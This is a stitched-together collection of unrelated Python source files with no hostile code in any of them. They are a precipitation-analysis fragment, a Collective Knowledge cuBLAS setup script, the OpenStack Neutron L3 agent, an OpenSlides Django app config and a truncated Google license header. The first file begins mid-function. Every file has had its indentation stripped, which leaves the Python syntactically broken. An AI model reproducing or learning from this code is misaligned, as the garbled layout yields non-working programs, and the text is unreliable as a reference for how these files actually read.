v['RESID'] = v['TOT'] - v['MMC'] - v['PGF'] - v['EDDY']
return v
# ----------------------------------------------------------------------
def kerala_boundaries(filenm='data/india_state.geojson'):
"""Return x, y vectors of coordinates for Kerala region boundaries."""
with open(filenm) as f:
data = json.load(f)
i_region, i_poly = 17, 44
poly = data['features'][i_region]['geometry']['coordinates'][i_poly][0]
arr = np.array(poly)
x, y = arr[:, 0], arr[:, 1]
# Cut out wonky bits
i1, i2 = 8305, 19200
x = np.concatenate((x[:i1], x[i2:]))
y = np.concatenate((y[:i1], y[i2:]))
return x, y
# ----------------------------------------------------------------------
def find_zeros_1d(x, y, xmin=None, xmax=None, interp=0.1, return_type='all'):
"""Find x-coordinate of zero(s) of y between xmin and xmax.
Parameter return_type determines what to return if more than one
zero crossing: 'all', 'min', or 'max'.
"""
if xmin is None:
xmin = np.nanmin(x)
if xmax is None:
xmax = np.nanmax(x)
xi = np.arange(xmin, xmax + interp/2.0, interp)
yi = np.interp(xi, x, y)
# Find zero crossings
ind = ((yi[1:] * yi[:-1]) < 0)
ind = np.concatenate((ind, [False]))
if ind.sum() == 0:
return np.nan
xzero = xi[ind]
if return_type.lower() == 'min':
xzero = np.min(xzero)
if return_type.lower() == 'max':
xzero = np.max(xzero)
return xzero
# ----------------------------------------------------------------------
def precip_centroid(precip, lat=None, latmin=-20, latmax=20, N=10):
"""Return the centroid defined as:
integral[lat * (cos(lat)*precip)^N] / integral[(cos(lat)*precip)^N]
where the integral is dlat from latmin to latmax
"""
if lat is None:
lat = atm.get_coord(precip, 'lat')
latrad = np.radians(lat)
coslat = np.cos(latrad)
|
|
#
# Collective Knowledge (individual environment - setup)
#
# See CK LICENSE.txt for licensing details
# See CK COPYRIGHT.txt for copyright details
#
# Developer: Grigori Fursin, Grigori.Fursin@cTuning.org, http://fursin.net
#
import os
##############################################################################
# customize directories to automatically find and register software
def dirs(i):
hosd=i.get('host_os_dict',{})
tosd=i.get('target_os_dict',{})
phosd=hosd.get('ck_name','')
hbits=hosd.get('bits','')
ptosd=tosd.get('ck_name','')
lst=i['dirs']
dirs=lst
if ptosd=='win':
dirs=[]
for p in lst:
dirs.append(os.path.join(p, 'NVIDIA GPU Computing Toolkit\\CUDA'))
return {'return':0, 'dirs':dirs}
##############################################################################
# get version from path
def version_cmd(i):
ck=i['ck_kernel']
fp=i['full_path']
fn=os.path.basename(fp)
rfp=os.path.realpath(fp)
rfn=os.path.basename(rfp)
ver=''
if rfn.startswith(fn):
ver=rfn[len(fn)+1:]
if ver!='':
ver='api-'+ver
return {'return':0, 'cmd':'', 'version':ver}
##############################################################################
# setup environment setup
def setup(i):
"""
Input: {
cfg - meta of this soft entry
self_cfg - meta of module soft
ck_kernel - import CK kernel module (to reuse functions)
host_os_uoa - host OS UOA
host_os_uid - host OS UID
host_os_dict - host OS meta
target_os_uoa - target OS UOA
target_os_uid - target OS UID
target_os_dict - target OS meta
target_device_id - target device ID (if via ADB)
tags - list of tags used to search this entry
env - updated environment vars from meta
customize - updated customize vars from meta
deps - resolved dependencies for this soft
interactive - if 'yes', can ask questions, otherwise quiet
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
bat - prepared string for bat file
}
"""
import os
# Get variables
ck=i['ck_kernel']
s=''
iv=i.get('interactive','')
cus=i.get('customize',{})
fp=cus.get('full_path','')
hosd=i['host_os_dict']
tosd=i['target_os_dict']
# Check platform
hplat=hosd.get('ck_name','')
hproc=hosd.get('processor','')
tproc=tosd.get('processor','')
remote=tosd.get('remote','')
tbits=tosd.get('bits','')
env=i['env']
pi=fp
found=False
while True:
if os.path.isdir(os.path.join(pi,'lib')) or os.path.isdir(os.path.join(pi,'lib64')):
found=True
break
pix=os.path.dirname(pi)
if pix==pi:
break
pi=pix
if not found:
return {'return':1, 'error':'can\'t find root dir of this installation'}
############################################################
# Setting environment depending on the platform
if hplat=='win':
pl=''
pinc=''
if fp!='':
pl=os.path.dirname(fp)
cus['path_lib']=pl
pl1=os.path.dirname(pl)
pl2=os.path.dirname(pl1)
pi=''
if os.path.isfile(os.path.join(pl1,'include','cublas.h')):
pi=pl1
elif os.path.isfile(os.path.join(pl2,'include','cublas.h')):
pi=pl2
pb=''
se=cus.get('skip_ext','')
# if Windows + CUDA
if remote=='yes':
return {'return':1, 'error':'this software doesn\'t support Android'}
else:
ext='x64'
if tbits=='32':
ext='Win32'
pb=pi+'\\bin'
if pl=='':
pl=pi+'\\lib\\'+ext
if pb!='': cus['path_bin']=pb
if pl!='': cus['path_lib']=pl
if pi!='': cus['path_include']=pi+'\\include'
if remote=='yes':
cus['dynamic_lib']='cublas.so'
else:
cus['static_lib']='cublas.lib'
cus['include_name']='cublas.h'
else:
### Linux ###
lb=os.path.basename(fp)
if lb=='': lb='libcublas.so'
pl=os.path.dirname(fp)
cus['path_lib']=pl
pl1=os.path.dirname(pl)
pl2=os.path.dirname(pl1)
pb=''
if os.path.isdir(os.path.join(pl1,'bin')):
pb=pl1
elif os.path.isdir(os.path.join(pl2,'bin')):
pb=pl2
if pb!='':
cus['path_bin']=os.path.join(pb,'bin')
pi=''
if os.path.isfile(os.path.join(pl1,'include','cublas.h')):
pi=pl1
elif os.path.isfile(os.path.join(pl2,'include','cublas.h')):
pi=pl2
if pi=='':
if os.path.isfile('/usr/include/cublas.h'):
pi='/usr'
elif os.path.isfile('/usr/local/include/cublas.h'):
pi='/usr/local'
if pi!='':
cus['path_include']=os.path.join(pi,'include')
cus['include_name']='cublas.h'
cus['static_lib']=lb
cus['dynamic_lib']=lb
r = ck.access({'action': 'lib_path_export_script', 'module_uoa': 'os', 'host_os_dict': hosd,
'lib_path': cus.get('path_lib','')})
if r['return']>0: return r
s += r['script']
ep=cus.get('env_prefix','')
if pi!='' and ep!='':
env[ep]=pi
if remote=='yes':
cus['skip_copy_to_remote']='yes'
env[ep+'_INCLUDE_NAME']=cus.get('include_name','')
env[ep+'_STATIC_NAME']=cus.get('static_lib','')
env[ep+'_DYNAMIC_NAME']=cus.get('dynamic_lib','')
return {'return':0, 'bat':s}
|
|
# Copyright 2012 VMware, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import eventlet
import netaddr
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging
from oslo_service import loopingcall
from oslo_service import periodic_task
from oslo_utils import excutils
from oslo_utils import timeutils
from neutron.agent.common import utils as common_utils
from neutron.agent.l3 import dvr
from neutron.agent.l3 import dvr_edge_router as dvr_router
from neutron.agent.l3 import dvr_local_router as dvr_local_router
from neutron.agent.l3 import ha
from neutron.agent.l3 import ha_router
from neutron.agent.l3 import legacy_router
from neutron.agent.l3 import namespace_manager
from neutron.agent.l3 import namespaces
from neutron.agent.l3 import router_info as rinf
from neutron.agent.l3 import router_processing_queue as queue
from neutron.agent.linux import external_process
from neutron.agent.linux import ip_lib
from neutron.agent.linux import pd
from neutron.agent.metadata import driver as metadata_driver
from neutron.agent import rpc as agent_rpc
from neutron.callbacks import events
from neutron.callbacks import registry
from neutron.callbacks import resources
from neutron.common import constants as l3_constants
from neutron.common import exceptions as n_exc
from neutron.common import ipv6_utils
from neutron.common import rpc as n_rpc
from neutron.common import topics
from neutron import context as n_context
from neutron.i18n import _LE, _LI, _LW
from neutron import manager
try:
from neutron_fwaas.services.firewall.agents.l3reference \
import firewall_l3_agent
except Exception:
# TODO(dougw) - REMOVE THIS FROM NEUTRON; during l3_agent refactor only
from neutron.services.firewall.agents.l3reference import firewall_l3_agent
LOG = logging.getLogger(__name__)
# TODO(Carl) Following constants retained to increase SNR during refactoring
NS_PREFIX = namespaces.NS_PREFIX
INTERNAL_DEV_PREFIX = namespaces.INTERNAL_DEV_PREFIX
EXTERNAL_DEV_PREFIX = namespaces.EXTERNAL_DEV_PREFIX
class L3PluginApi(object):
"""Agent side of the l3 agent RPC API.
API version history:
1.0 - Initial version.
1.1 - Floating IP operational status updates
1.2 - DVR support: new L3 plugin methods added.
- get_ports_by_subnet
- get_agent_gateway_port
Needed by the agent when operating in DVR/DVR_SNAT mode
1.3 - Get the list of activated services
1.4 - Added L3 HA update_router_state. This method was reworked in
to update_ha_routers_states
1.5 - Added update_ha_routers_states
1.6 - Added process_prefix_update
1.7 - DVR support: new L3 plugin methods added.
- delete_agent_gateway_port
"""
def __init__(self, topic, host):
self.host = host
target = oslo_messaging.Target(topic=topic, version='1.0')
self.client = n_rpc.get_client(target)
def get_routers(self, context, router_ids=None):
"""Make a remote process call to retrieve the sync data for routers."""
cctxt = self.client.prepare()
return cctxt.call(context, 'sync_routers', host=self.host,
router_ids=router_ids)
def get_external_network_id(self, context):
"""Make a remote process call to retrieve the external network id.
@raise oslo_messaging.RemoteError: with TooManyExternalNetworks as
exc_type if there are more than one
external network
"""
cctxt = self.client.prepare()
return cctxt.call(context, 'get_external_network_id', host=self.host)
def update_floatingip_statuses(self, context, router_id, fip_statuses):
"""Call the plugin update floating IPs's operational status."""
cctxt = self.client.prepare(version='1.1')
return cctxt.call(context, 'update_floatingip_statuses',
router_id=router_id, fip_statuses=fip_statuses)
def get_ports_by_subnet(self, context, subnet_id):
"""Retrieve ports by subnet id."""
cctxt = self.client.prepare(version='1.2')
return cctxt.call(context, 'get_ports_by_subnet', host=self.host,
subnet_id=subnet_id)
def get_agent_gateway_port(self, context, fip_net):
"""Get or create an agent_gateway_port."""
cctxt = self.client.prepare(version='1.2')
return cctxt.call(context, 'get_agent_gateway_port',
network_id=fip_net, host=self.host)
def get_service_plugin_list(self, context):
"""Make a call to get the list of activated services."""
cctxt = self.client.prepare(version='1.3')
return cctxt.call(context, 'get_service_plugin_list')
def update_ha_routers_states(self, context, states):
"""Update HA routers states."""
cctxt = self.client.prepare(version='1.5')
return cctxt.call(context, 'update_ha_routers_states',
host=self.host, states=states)
def process_prefix_update(self, context, prefix_update):
"""Process prefix update whenever prefixes get changed."""
cctxt = self.client.prepare(version='1.6')
return cctxt.call(context, 'process_prefix_update',
subnets=prefix_update)
def delete_agent_gateway_port(self, context, fip_net):
"""Delete Floatingip_agent_gateway_port."""
cctxt = self.client.prepare(version='1.7')
return cctxt.call(context, 'delete_agent_gateway_port',
host=self.host, network_id=fip_net)
class L3NATAgent(firewall_l3_agent.FWaaSL3AgentRpcCallback,
ha.AgentMixin,
dvr.AgentMixin,
manager.Manager):
"""Manager for L3NatAgent
API version history:
1.0 initial Version
1.1 changed the type of the routers parameter
to the routers_updated method.
It was previously a list of routers in dict format.
It is now a list of router IDs only.
Per rpc versioning rules, it is backwards compatible.
1.2 - DVR support: new L3 agent methods added.
- add_arp_entry
- del_arp_entry
Needed by the L3 service when dealing with DVR
"""
target = oslo_messaging.Target(version='1.2')
def __init__(self, host, conf=None):
if conf:
self.conf = conf
else:
self.conf = cfg.CONF
self.router_info = {}
self._check_config_params()
self.process_monitor = external_process.ProcessMonitor(
config=self.conf,
resource_type='router')
self.driver = common_utils.load_interface_driver(self.conf)
self.context = n_context.get_admin_context_without_session()
self.plugin_rpc = L3PluginApi(topics.L3PLUGIN, host)
self.fullsync = True
# Get the list of service plugins from Neutron Server
# This is the first place where we contact neutron-server on startup
# so retry in case its not ready to respond.
retry_count = 5
while True:
retry_count = retry_count - 1
try:
self.neutron_service_plugins = (
self.plugin_rpc.get_service_plugin_list(self.context))
except oslo_messaging.RemoteError as e:
with excutils.save_and_reraise_exception() as ctx:
ctx.reraise = False
LOG.warning(_LW('l3-agent cannot check service plugins '
'enabled at the neutron server when '
'startup due to RPC error. It happens '
'when the server does not support this '
'RPC API. If the error is '
'UnsupportedVersion you can ignore this '
'warning. Detail message: %s'), e)
self.neutron_service_plugins = None
except oslo_messaging.MessagingTimeout as e:
with excutils.save_and_reraise_exception() as ctx:
if retry_count > 0:
ctx.reraise = False
LOG.warning(_LW('l3-agent cannot check service '
'plugins enabled on the neutron '
'server. Retrying. '
'Detail message: %s'), e)
continue
break
self.metadata_driver = None
if self.conf.enable_metadata_proxy:
self.metadata_driver = metadata_driver.MetadataDriver(self)
self.namespaces_manager = namespace_manager.NamespaceManager(
self.conf,
self.driver,
self.conf.use_namespaces,
self.metadata_driver)
self._queue = queue.RouterProcessingQueue()
super(L3NATAgent, self).__init__(conf=self.conf)
self.target_ex_net_id = None
self.use_ipv6 = ipv6_utils.is_enabled()
self.pd = pd.PrefixDelegation(self.context, self.process_monitor,
self.driver,
self.plugin_rpc.process_prefix_update,
self.create_pd_router_update,
self.conf)
def _check_config_params(self):
"""Check items in configuration files.
Check for required and invalid configuration items.
The actual values are not verified for correctness.
"""
if not self.conf.interface_driver:
msg = _LE('An interface driver must be specified')
LOG.error(msg)
raise SystemExit(1)
if not self.conf.use_namespaces and not self.conf.router_id:
msg = _LE('Router id is required if not using namespaces.')
LOG.error(msg)
raise SystemExit(1)
if self.conf.ipv6_gateway:
# ipv6_gateway configured. Check for valid v6 link-local address.
try:
msg = _LE("%s used in config as ipv6_gateway is not a valid "
"IPv6 link-local address."),
ip_addr = netaddr.IPAddress(self.conf.ipv6_gateway)
if ip_addr.version != 6 or not ip_addr.is_link_local():
LOG.error(msg, self.conf.ipv6_gateway)
raise SystemExit(1)
except netaddr.AddrFormatError:
LOG.error(msg, self.conf.ipv6_gateway)
raise SystemExit(1)
def _fetch_external_net_id(self, force=False):
"""Find UUID of single external network for this agent."""
if self.conf.gateway_external_network_id:
return self.conf.gateway_external_network_id
# L3 agent doesn't use external_network_bridge to handle external
# networks, so bridge_mappings with provider networks will be used
# and the L3 agent is able to handle any external networks.
if not self.conf.external_network_bridge:
return
if not force and self.target_ex_net_id:
return self.target_ex_net_id
try:
self.target_ex_net_id = self.plugin_rpc.get_external_network_id(
self.context)
return self.target_ex_net_id
except oslo_messaging.RemoteError as e:
with excutils.save_and_reraise_exception() as ctx:
if e.exc_type == 'TooManyExternalNetworks':
ctx.reraise = False
msg = _(
"The 'gateway_external_network_id' option must be "
"configured for this agent as Neutron has more than "
"one external network.")
raise Exception(msg)
def _create_router(self, router_id, router):
# TODO(Carl) We need to support a router that is both HA and DVR. The
# patch that enables it will replace these lines. See bug #1365473.
if router.get('distributed') and router.get('ha'):
raise n_exc.DvrHaRouterNotSupported(router_id=router_id)
args = []
kwargs = {
'router_id': router_id,
'router': router,
'use_ipv6': self.use_ipv6,
'agent_conf': self.conf,
'interface_driver': self.driver,
}
if router.get('distributed'):
kwargs['agent'] = self
kwargs['host'] = self.host
if self.conf.agent_mode == l3_constants.L3_AGENT_MODE_DVR_SNAT:
return dvr_router.DvrEdgeRouter(*args, **kwargs)
else:
return dvr_local_router.DvrLocalRouter(*args, **kwargs)
if router.get('ha'):
kwargs['state_change_callback'] = self.enqueue_state_change
return ha_router.HaRouter(*args, **kwargs)
return legacy_router.LegacyRouter(*args, **kwargs)
def _router_added(self, router_id, router):
ri = self._create_router(router_id, router)
registry.notify(resources.ROUTER, events.BEFORE_CREATE,
self, router=ri)
self.router_info[router_id] = ri
ri.initialize(self.process_monitor)
# TODO(Carl) This is a hook in to fwaas. It should be cleaned up.
self.process_router_add(ri)
def _safe_router_removed(self, router_id):
"""Try to delete a router and return True if successful."""
try:
self._router_removed(router_id)
except Exception:
LOG.exception(_LE('Error while deleting router %s'), router_id)
return False
else:
return True
def _router_removed(self, router_id):
ri = self.router_info.get(router_id)
if ri is None:
LOG.warn(_LW("Info for router %s was not found. "
"Performing router cleanup"), router_id)
self.namespaces_manager.ensure_router_cleanup(router_id)
return
registry.notify(resources.ROUTER, events.BEFORE_DELETE,
self, router=ri)
ri.delete(self)
del self.router_info[router_id]
registry.notify(resources.ROUTER, events.AFTER_DELETE, self, router=ri)
def update_fip_statuses(self, ri, existing_floating_ips, fip_statuses):
# Identify floating IPs which were disabled
ri.floating_ips = set(fip_statuses.keys())
for fip_id in existing_floating_ips - ri.floating_ips:
fip_statuses[fip_id] = l3_constants.FLOATINGIP_STATUS_DOWN
# filter out statuses that didn't change
fip_statuses = {f: stat for f, stat in fip_statuses.items()
if stat != rinf.FLOATINGIP_STATUS_NOCHANGE}
if not fip_statuses:
return
LOG.debug('Sending floating ip statuses: %s', fip_statuses)
# Update floating IP status on the neutron server
self.plugin_rpc.update_floatingip_statuses(
self.context, ri.router_id, fip_statuses)
def router_deleted(self, context, router_id):
"""Deal with router deletion RPC message."""
LOG.debug('Got router deleted notification for %s', router_id)
update = queue.RouterUpdate(router_id,
queue.PRIORITY_RPC,
action=queue.DELETE_ROUTER)
self._queue.add(update)
def routers_updated(self, context, routers):
"""Deal with routers modification and creation RPC message."""
LOG.debug('Got routers updated notification :%s', routers)
if routers:
# This is needed for backward compatibility
if isinstance(routers[0], dict):
routers = [router['id'] for router in routers]
for id in routers:
update = queue.RouterUpdate(id, queue.PRIORITY_RPC)
self._queue.add(update)
def router_removed_from_agent(self, context, payload):
LOG.debug('Got router removed from agent :%r', payload)
router_id = payload['router_id']
update = queue.RouterUpdate(router_id,
queue.PRIORITY_RPC,
action=queue.DELETE_ROUTER)
self._queue.add(update)
def router_added_to_agent(self, context, payload):
LOG.debug('Got router added to agent :%r', payload)
self.routers_updated(context, payload)
def _process_router_if_compatible(self, router):
if (self.conf.external_network_bridge and
not ip_lib.device_exists(self.conf.external_network_bridge)):
LOG.error(_LE("The external network bridge '%s' does not exist"),
self.conf.external_network_bridge)
return
# If namespaces are disabled, only process the router associated
# with the configured agent id.
if (not self.conf.use_namespaces and
router['id'] != self.conf.router_id):
raise n_exc.RouterNotCompatibleWithAgent(router_id=router['id'])
# Either ex_net_id or handle_internal_only_routers must be set
ex_net_id = (router['external_gateway_info'] or {}).get('network_id')
if not ex_net_id and not self.conf.handle_internal_only_routers:
raise n_exc.RouterNotCompatibleWithAgent(router_id=router['id'])
# If target_ex_net_id and ex_net_id are set they must be equal
target_ex_net_id = self._fetch_external_net_id()
if (target_ex_net_id and ex_net_id and ex_net_id != target_ex_net_id):
# Double check that our single external_net_id has not changed
# by forcing a check by RPC.
if ex_net_id != self._fetch_external_net_id(force=True):
raise n_exc.RouterNotCompatibleWithAgent(
router_id=router['id'])
if router['id'] not in self.router_info:
self._process_added_router(router)
else:
self._process_updated_router(router)
def _process_added_router(self, router):
self._router_added(router['id'], router)
ri = self.router_info[router['id']]
ri.router = router
ri.process(self)
registry.notify(resources.ROUTER, events.AFTER_CREATE, self, router=ri)
def _process_updated_router(self, router):
ri = self.router_info[router['id']]
ri.router = router
registry.notify(resources.ROUTER, events.BEFORE_UPDATE,
self, router=ri)
ri.process(self)
registry.notify(resources.ROUTER, events.AFTER_UPDATE, self, router=ri)
def _process_router_update(self):
for rp, update in self._queue.each_update_to_next_router():
LOG.debug("Starting router update for %s, action %s, priority %s",
update.id, update.action, update.priority)
if update.action == queue.PD_UPDATE:
self.pd.process_prefix_update()
continue
router = update.router
if update.action != queue.DELETE_ROUTER and not router:
try:
update.timestamp = timeutils.utcnow()
routers = self.plugin_rpc.get_routers(self.context,
[update.id])
except Exception:
msg = _LE("Failed to fetch router information for '%s'")
LOG.exception(msg, update.id)
self.fullsync = True
continue
if routers:
router = routers[0]
if not router:
removed = self._safe_router_removed(update.id)
if not removed:
# TODO(Carl) Stop this fullsync non-sense. Just retry this
# one router by sticking the update at the end of the queue
# at a lower priority.
self.fullsync = True
else:
# need to update timestamp of removed router in case
# there are older events for the same router in the
# processing queue (like events from fullsync) in order to
# prevent deleted router re-creation
rp.fetched_and_processed(update.timestamp)
continue
try:
self._process_router_if_compatible(router)
except n_exc.RouterNotCompatibleWithAgent as e:
LOG.exception(e.msg)
# Was the router previously handled by this agent?
if router['id'] in self.router_info:
LOG.error(_LE("Removing incompatible router '%s'"),
router['id'])
self._safe_router_removed(router['id'])
except Exception:
msg = _LE("Failed to process compatible router '%s'")
LOG.exception(msg, update.id)
self.fullsync = True
continue
LOG.debug("Finished a router update for %s", update.id)
rp.fetched_and_processed(update.timestamp)
def _process_routers_loop(self):
LOG.debug("Starting _process_routers_loop")
pool = eventlet.GreenPool(size=8)
while True:
pool.spawn_n(self._process_router_update)
# NOTE(kevinbenton): this is set to 1 second because the actual interval
# is controlled by a FixedIntervalLoopingCall in neutron/service.py that
# is responsible for task execution.
@periodic_task.periodic_task(spacing=1)
def periodic_sync_routers_task(self, context):
self.process_services_sync(context)
if not self.fullsync:
return
LOG.debug("Starting fullsync periodic_sync_routers_task")
# self.fullsync is True at this point. If an exception -- caught or
# uncaught -- prevents setting it to False below then the next call
# to periodic_sync_routers_task will re-enter this code and try again.
# Context manager self.namespaces_manager captures a picture of
# namespaces *before* fetch_and_sync_all_routers fetches the full list
# of routers from the database. This is important to correctly
# identify stale ones.
try:
with self.namespaces_manager as ns_manager:
self.fetch_and_sync_all_routers(context, ns_manager)
except n_exc.AbortSyncRouters:
self.fullsync = True
def fetch_and_sync_all_routers(self, context, ns_manager):
prev_router_ids = set(self.router_info)
timestamp = timeutils.utcnow()
try:
if self.conf.use_namespaces:
routers = self.plugin_rpc.get_routers(context)
else:
routers = self.plugin_rpc.get_routers(context,
[self.conf.router_id])
except oslo_messaging.MessagingException:
LOG.exception(_LE("Failed synchronizing routers due to RPC error"))
raise n_exc.AbortSyncRouters()
else:
LOG.debug('Processing :%r', routers)
for r in routers:
ns_manager.keep_router(r['id'])
if r.get('distributed'):
# need to keep fip namespaces as well
ext_net_id = (r['external_gateway_info'] or {}).get(
'network_id')
if ext_net_id:
ns_manager.keep_ext_net(ext_net_id)
update = queue.RouterUpdate(r['id'],
queue.PRIORITY_SYNC_ROUTERS_TASK,
router=r,
timestamp=timestamp)
self._queue.add(update)
self.fullsync = False
LOG.debug("periodic_sync_routers_task successfully completed")
curr_router_ids = set([r['id'] for r in routers])
# Delete routers that have disappeared since the last sync
for router_id in prev_router_ids - curr_router_ids:
ns_manager.keep_router(router_id)
update = queue.RouterUpdate(router_id,
queue.PRIORITY_SYNC_ROUTERS_TASK,
timestamp=timestamp,
action=queue.DELETE_ROUTER)
self._queue.add(update)
def after_start(self):
# Note: the FWaaS' vArmourL3NATAgent is a subclass of L3NATAgent. It
# calls this method here. So Removing this after_start() would break
# vArmourL3NATAgent. We need to find out whether vArmourL3NATAgent
# can have L3NATAgentWithStateReport as its base class instead of
# L3NATAgent.
eventlet.spawn_n(self._process_routers_loop)
LOG.info(_LI("L3 agent started"))
# When L3 agent is ready, we immediately do a full sync
self.periodic_sync_routers_task(self.context)
def create_pd_router_update(self):
router_id = None
update = queue.RouterUpdate(router_id,
queue.PRIORITY_PD_UPDATE,
timestamp=timeutils.utcnow(),
action=queue.PD_UPDATE)
self._queue.add(update)
class L3NATAgentWithStateReport(L3NATAgent):
def __init__(self, host, conf=None):
self.use_call = True
super(L3NATAgentWithStateReport, self).__init__(host=host, conf=conf)
self.state_rpc = agent_rpc.PluginReportStateAPI(topics.PLUGIN)
self.agent_state = {
'binary': 'neutron-l3-agent',
'host': host,
'topic': topics.L3_AGENT,
'configurations': {
'agent_mode': self.conf.agent_mode,
'use_namespaces': self.conf.use_namespaces,
'router_id': self.conf.router_id,
'handle_internal_only_routers':
self.conf.handle_internal_only_routers,
'external_network_bridge': self.conf.external_network_bridge,
'gateway_external_network_id':
self.conf.gateway_external_network_id,
'interface_driver': self.conf.interface_driver,
'log_agent_heartbeats': self.conf.AGENT.log_agent_heartbeats},
'start_flag': True,
'agent_type': l3_constants.AGENT_TYPE_L3}
report_interval = self.conf.AGENT.report_interval
if report_interval:
self.heartbeat = loopingcall.FixedIntervalLoopingCall(
self._report_state)
self.heartbeat.start(interval=report_interval)
def _report_state(self):
num_ex_gw_ports = 0
num_interfaces = 0
num_floating_ips = 0
router_infos = self.router_info.values()
num_routers = len(router_infos)
for ri in router_infos:
ex_gw_port = ri.get_ex_gw_port()
if ex_gw_port:
num_ex_gw_ports += 1
num_interfaces += len(ri.router.get(l3_constants.INTERFACE_KEY,
[]))
num_floating_ips += len(ri.router.get(l3_constants.FLOATINGIP_KEY,
[]))
configurations = self.agent_state['configurations']
configurations['routers'] = num_routers
configurations['ex_gw_ports'] = num_ex_gw_ports
configurations['interfaces'] = num_interfaces
configurations['floating_ips'] = num_floating_ips
try:
self.state_rpc.report_state(self.context, self.agent_state,
self.use_call)
self.agent_state.pop('start_flag', None)
self.use_call = False
except AttributeError:
# This means the server does not support report_state
LOG.warn(_LW("Neutron server does not support state report."
" State report for this agent will be disabled."))
self.heartbeat.stop()
return
except Exception:
LOG.exception(_LE("Failed reporting state!"))
def after_start(self):
eventlet.spawn_n(self._process_routers_loop)
LOG.info(_LI("L3 agent started"))
# Do the report state before we do the first full sync.
self._report_state()
# When L3 agent is ready, we immediately do a full sync
self.periodic_sync_routers_task(self.context)
self.pd.after_start()
def agent_updated(self, context, payload):
"""Handle the agent_updated notification event."""
self.fullsync = True
LOG.info(_LI("agent_updated by server side %s!"), payload)
|
|
import sys
from collections import OrderedDict
from operator import attrgetter
from typing import Any, Dict, List, Set
from django.apps import AppConfig
from django.conf import settings
from django.db.models.signals import post_migrate
class CoreAppConfig(AppConfig):
name = "openslides.core"
verbose_name = "OpenSlides Core"
angular_site_module = True
def ready(self):
# Import all required stuff.
from .config import config
from .projector import register_projector_elements
from . import serializers # noqa
from .signals import (
delete_django_app_permissions,
get_permission_change_data,
permission_change,
post_permission_creation,
)
from .views import (
ChatMessageViewSet,
ConfigViewSet,
CountdownViewSet,
HistoryViewSet,
ProjectorMessageViewSet,
ProjectorViewSet,
TagViewSet,
)
from .websocket import (
NotifyWebsocketClientMessage,
ConstantsWebsocketClientMessage,
GetElementsWebsocketClientMessage,
AutoupdateWebsocketClientMessage,
ListenToProjectors,
)
from ..utils.access_permissions import required_user
from ..utils.cache import element_cache
from ..utils.constants import set_constants, get_constants_from_apps
from ..utils.rest_api import router
from ..utils.websocket import register_client_message
# Collect all config variables before getting the constants.
config.collect_config_variables_from_apps()
# Skip all database related accesses during migrations.
is_normal_server_start = False
for sys_part in sys.argv:
for entry in ("runserver", "gunicorn", "daphne", "create-example-data"):
if sys_part.endswith(entry):
is_normal_server_start = True
break
# Set constants
if is_normal_server_start:
set_constants(get_constants_from_apps())
# Define projector elements.
register_projector_elements()
# Connect signals.
post_permission_creation.connect(
delete_django_app_permissions, dispatch_uid="delete_django_app_permissions"
)
permission_change.connect(
get_permission_change_data, dispatch_uid="core_get_permission_change_data"
)
post_migrate.connect(
call_save_default_values,
sender=self,
dispatch_uid="core_save_config_default_values",
)
# Register viewsets.
router.register(
self.get_model("Projector").get_collection_string(), ProjectorViewSet
)
router.register(
self.get_model("ChatMessage").get_collection_string(), ChatMessageViewSet
)
router.register(self.get_model("Tag").get_collection_string(), TagViewSet)
router.register(
self.get_model("ConfigStore").get_collection_string(),
ConfigViewSet,
"config",
)
router.register(
self.get_model("ProjectorMessage").get_collection_string(),
ProjectorMessageViewSet,
)
router.register(
self.get_model("Countdown").get_collection_string(), CountdownViewSet
)
router.register(
self.get_model("History").get_collection_string(), HistoryViewSet
)
# Sets the cache and builds the startup history
if is_normal_server_start:
element_cache.ensure_cache()
self.get_model("History").objects.build_history()
# Register client messages
register_client_message(NotifyWebsocketClientMessage())
register_client_message(ConstantsWebsocketClientMessage())
register_client_message(GetElementsWebsocketClientMessage())
register_client_message(AutoupdateWebsocketClientMessage())
register_client_message(ListenToProjectors())
# register required_users
required_user.add_collection_string(
self.get_model("ChatMessage").get_collection_string(), required_users
)
def get_config_variables(self):
from .config_variables import get_config_variables
return get_config_variables()
def get_startup_elements(self):
"""
Yields all Cachables required on startup i. e. opening the websocket
connection.
"""
for model_name in (
"Projector",
"ChatMessage",
"Tag",
"ProjectorMessage",
"Countdown",
"ConfigStore",
"History",
):
yield self.get_model(model_name)
def get_angular_constants(self):
from .config import config
constants: Dict[str, Any] = {}
# Client settings
client_settings_keys = [
"MOTION_IDENTIFIER_MIN_DIGITS",
"MOTION_IDENTIFIER_WITHOUT_BLANKS",
"MOTIONS_ALLOW_AMENDMENTS_OF_AMENDMENTS",
]
client_settings_dict = {}
for key in client_settings_keys:
try:
client_settings_dict[key] = getattr(settings, key)
except AttributeError:
# Settings key does not exist. Do nothing. The client will
# treat this as undefined.
pass
constants["OpenSlidesSettings"] = client_settings_dict
# Config variables
config_groups: List[Any] = []
for config_variable in sorted(
config.config_variables.values(), key=attrgetter("weight")
):
if config_variable.is_hidden():
# Skip hidden config variables. Do not even check groups and subgroups.
continue
if not config_groups or config_groups[-1]["name"] != config_variable.group:
# Add new group.
config_groups.append(
OrderedDict(name=config_variable.group, subgroups=[])
)
if (
not config_groups[-1]["subgroups"]
or config_groups[-1]["subgroups"][-1]["name"]
!= config_variable.subgroup
):
# Add new subgroup.
config_groups[-1]["subgroups"].append(
OrderedDict(name=config_variable.subgroup, items=[])
)
# Add the config variable to the current group and subgroup.
config_groups[-1]["subgroups"][-1]["items"].append(config_variable.data)
constants["OpenSlidesConfigVariables"] = config_groups
return constants
def call_save_default_values(**kwargs):
from .config import config
config.save_default_values()
def required_users(element: Dict[str, Any]) -> Set[int]:
"""
Returns all user ids that are displayed as chatters.
"""
return set(element["user_id"])
|
|
#!/usr/bin/python2.4
#
# Copyright 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
